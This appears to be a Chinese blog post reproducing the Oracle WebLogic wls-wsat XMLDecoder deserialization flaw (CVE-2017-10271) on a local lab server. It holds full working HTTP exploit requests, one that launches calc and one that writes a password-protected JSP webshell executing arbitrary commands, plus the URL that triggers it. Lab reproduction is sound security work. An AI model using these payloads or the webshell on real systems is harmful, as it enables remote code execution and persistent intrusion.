2. 程式人生 > >Weblogic 小於10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

Weblogic 小於10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

阿新 發佈:2018-11-15

之前本來複現過一次的,結果後來資料丟了,只好再來一遍。
沒找到在linux下命令列安裝的方法,於是直接在windows上安裝算了。

12.2.1.2.0下載:

https://download.oracle.com/otn/nt/middleware/12c/12212/fmw_12.2.1.2.0_wls_Disk1_1of1.zip?AuthParam=1541742643_250a3decf4f39e039175be9f5f93d122

windows環境,需以管理員身份執行,否則會出現:
在這裡插入圖片描述
以管理員身份執行:
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述

最後啟動管理伺服器:
在這裡插入圖片描述
檢視網路埠:
在這裡插入圖片描述

然後exploit之後沒有成功。

https://www.exploit-db.com/exploits/43458/

可能是Java8的原因,然而切換Java版本比較困難。
最終終於找到修改Java Home的地方了,在user_projects\domains\base_domain\bin\setDomainEnv.cmd
然而執行weblogic的時候提示說不支援Java8以下的。
在這裡插入圖片描述
然後我把請求方到burp裡看了一下,修改成windows的payload,然後依然發現是404 Not Found。難道官方已經把這個版本中的受影響的元件刪除了?
在這裡插入圖片描述
在這裡插入圖片描述

10.3.6.0下載:

https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_generic.jar


安裝的時候大概是這樣:
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
這次終於可以訪問了/wls-wsat/CoordinatorPortType
在這裡插入圖片描述

PoC:
https://www.exploit-db.com/exploits/43458/

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 539

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="1" >
            <void index="0">
              <string>calc</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

彈計算器:在這裡插入圖片描述
寫入webshell(https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271):
請求:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 920

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<%   if("cqq".equals(request.getParameter("password"))){  
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();  
        int a = -1;  
        byte[] b = new byte[2048];  
        out.print("<pre>");  
        while((a=in.read(b))!=-1){  
            out.println(new String(b));  
        }  
        out.print("</pre>");  
    } %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

然後可以通過http請求:

http://127.0.0.1:7001/bea_wls_internal/test.jsp?password=cqq&command=tasklist

在這裡插入圖片描述

相關推薦

Weblogic 小於10.3.6 &#39;wls-wsat&#39; XMLDecoder 序列漏洞CVE-2017-10271

之前本來複現過一次的,結果後來資料丟了,只好再來一遍。 沒找到在linux下命令列安裝的方法,於是直接在windows上安裝算了。 12.2.1.2.0下載: https://download.oracle.com/otn/nt/middleware/12c/12212/fmw_

Weblogic XMLDecoder 序列漏洞CVE-2017-10271檢測與利用復現

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。 漏洞環境搭建 可以參考: https://blog.csdn.net/q

JBoss 5.x/6.x 序列漏洞CVE-2017-12149

該漏洞為 Java反序列化錯誤型別,存在於 Jboss 的 HttpInvoker 元件中的 ReadOnlyAccessFilter 過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的資料流進行反序列化,從而導致了漏洞。 環境 JBoss 5.x/

WebLogic序列漏洞CVE-2017-3248

使用Java 7和Java 8均可成功復現。 漏洞復現 先啟動weblogic(終端#1) ➜ base_domain ./startWebLogic.sh 在某埠監聽(接收反彈shell) ➜ ysoserial nc -klv 7777 Listeni

WebLogicWLS 組件漏洞CVE-2017-10271專項檢測工具

風險 bsp load 服務 app mage www 趨勢 新的 來源: 時間:2017-12-23 00:00:00 作者:  瀏覽:1929 次 近期安恒信息在應急響應過程中發現有惡意攻擊者利用WebLogic漏洞對企業服務器發起大範圍遠程攻擊,攻擊成功後植入挖

WebLogic 10.3.6.0 升級序列漏洞補丁

成功 wget命令 下載 攻擊 generic 價格 server move 被黑 由於最近比特幣被炒到近乎不可思議的價格,所以網絡上的肉雞都被黑產們一個個培養成了挖礦雞。今兒就聊聊如何進行WebLogic10的反序列化漏洞的升級方法。 1、修改bsu.sh 把內存

Weblogic &#39;wls-wsat&#39; XMLDecoder 序列_CVE-2017-10271漏洞復現

Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞復現 一、漏洞概述  WebLogic的 WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏

weblogic AND jboss 序列漏洞

我們 cat logic -- ram icc 訪問 web訪問 驗證 C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF serve

WebLogic 任意文件上傳 遠程代碼執行漏洞 CVE-2018-2894------->>>任意文件上傳檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

【原創】Spring Data Redis <=2.0.3序列漏洞

反序列化 默認 用戶 字節碼 href http strong comm ons Spring Data Redis隸屬於Spring Data家族, 提供簡單易用的方式來訪問Redis緩存。 Spring Data Redis在往Redis裏面寫數據的時候,默認會先對數據

weblogic序列漏洞 cve-2018-3245

type 技術 序列化 int live 查看 efs intent loader weblogic反序列化漏洞 CVE-2018-3245 0x00 針對cve-2018-2893的修復 針對JRMP反序列化修復的方式依舊是增加黑名單:黑名單package:java.rm

記錄WebLogic(CVE-2017-10271)序列漏洞找WEBSHELL地址

記錄WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址 首先,郭姓某牛丟來了一個有weblogic漏洞的地址http://x.x.x.x:7001 說用k8的weblogic2628去getshell不能連結shell,我也試了下,好像確實不能連

Flutter | Json自動序列——json_serializable附原始碼3

轉載自:https://www.jianshu.com/p/b307a377c5e8   前言 Google推出flutter這樣一個新的高效能跨平臺(Android,ios)快速開發框架之後,被業界許多開發者所關注。我在接觸了flutter之後發現這個確實是一個好東西,好東西

weblogic序列漏洞

1、檢測工具 https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271 2、http請求模擬工具 Fiddler 3、檢測方法 ontent-Type: text/xml <soapenv:Envelope

WebLogic序列漏洞CVE-2018-2628漏洞檢測與利用

Oracle官方釋出了4月份的關鍵補丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可導致遠端程式碼執行漏洞,漏洞威脅等級為高危,對應的CVE編號為CVE-2018-26 影響版本 Oracle WebLogic Se

WebLogic序列漏洞的利用與防禦

0x00 前言 上週出的 WebLogic 反序列漏洞,跟進分析的時候發現涉及到不少 Java 反序列化的知識,然後借這個機會把一些 Java 反序列化漏洞的利用與防禦需要的知識點重新捋一遍,做了一些測試和除錯後寫成這份報告。文中若有錯漏之處,歡迎指出。 0x01 J

Weblogic序列漏洞(CVE-2018-2628),T3協議白名單

 2018年4月18日凌晨,Oracle官方釋出了4月份的關鍵補丁更新,其中包含一個高危的Weblogic反序列化漏洞(CVE-2018-2628),通過該漏洞,攻擊者可以在未授權的情況下遠端執行程式碼。攻擊者只需要傳送精心構造的T3協議資料,就可以獲取目標伺服器的許可權。 

CVE-2020-14644 weblogic iiop序列漏洞

### 0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 ### 0x01 環境準備 1、安裝weblogic server版本。 2、生成wlfullclient.jar包 安裝weblogi

關於weblogic 10.3.6.0 的漏洞復現1

iter oid sch AD 成功 str context blog env 最近小R 搭建了個weblogic, 因為之前在公司找系統漏洞的時候,發現了這個漏洞,所以為了特地專門搭建了個10.3.6.0版本。 漏洞編號: CVE-2017-10271 漏洞的描述:就是

WebLogic 10.3.6安裝GFWX補丁

1、檢視基礎環境: (1)檢視JDK版本:# java -version (2)WebLogic安裝目錄:/app/weblogic (3)檢視WebLogic版本: 方法一: # su - weblogic $ cd /app/weblogic/utils/bsu $ ./bsu.sh